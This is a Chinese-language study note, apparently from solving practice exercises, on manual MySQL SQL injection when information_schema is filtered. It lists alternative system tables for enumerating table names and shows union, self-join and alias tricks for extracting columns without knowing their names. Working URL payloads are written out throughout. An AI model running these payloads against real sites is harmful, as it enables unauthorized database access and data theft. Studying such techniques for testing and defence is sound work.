做题时 遇到了些问题,所以记录下笔记。
在手工SQL注入时 information_schema 库 被过滤了怎么办?
mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。
在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .
这些数据库内的信息。
在 Mysql 5.7 版本中新增了 sys.schema , 基础数据 来自于 performance_schema和information_sche两个库中,其本身并不存储数据。
所以 就有了几个可以代替 information_schema 注入的作用,
查询表的统计信息,其中还包括Innodb缓冲池统计信息,默认情况下按照增删改查操作的总表I/O延迟时间(执行时间)降序排序
…
sys.schema_table_statistics_with_buffer
sys.x$schema_table_statistics_with_buffer
但是 sys.schema_auto_increment_columns 这个库有点局限 需要root 才能访问。
类似的,可以利用的表还有 :
mysql.innodb_table_stats
、mysql.innodb_table_index
同样存放有库名表名
成功查询到。
总结一下:
sys.schema_auto_increment_columns
sys.schema_table_statistics_with_buffer
mysql.innodb_table_stats
mysql.innodb_table_index
均可代替 information_schema
上面的方法 可以读取到数据库 和 表名, 但是列名我们改怎么读取。
通过系统关键字 join 可建立两表之间的内连接,通过对想要查询列名所在的表与其自身
- 爆表名
- ?id=-1' union select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()--+
- ?id=-1' union select 1,2,group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()--+
-
- 爆字段名
- 获取第一列的字段名及后面每一列字段名
- ?id=-1' union select*from (select * from users as a join users as b)as c--+
- ?id=-1' union select*from (select * from users as a join users b using(id,username))c--+
- ?id=-1' union select*from (select * from users as a join users b using(id,username,password))c--+
- 数据库中as作用是起别名,as是可以省略的,为了增加可读性,建议不省略。
正常查询
select 1,2,3,4,5 union select * from users;
无列名注入关键 就是要猜测表里有多少个列,要一一对应上,上面例子是有5个列
1,2,3,4,5 的作用就是对列起别名,替换为后面无列名注入做准备
接着就可以使用数字来对应列进行查询,如3对应了表里面的pass
select `3` from (select 1,2,3,4,5 union select * from users)as a;
就相当于select pass from (select 1,2,3,4,5 union select * from users)as a;
SQL 中反引号是可以代表数据库名和列名的
(select 1,2,3,4,5 union select * from users)as a 把括号里的查询数据重命名一张新的表 a,在从中查询
当反引号被禁用时,就可以使用起别名的方法来代替
select b from (select 1,2, 3 as b ,4,5 union select * from users)as a;
在注入时同时查询多个列
select group_concat(b,c) from (select 1,2, 3 as b , 4 as c ,5 union select * from users)as a;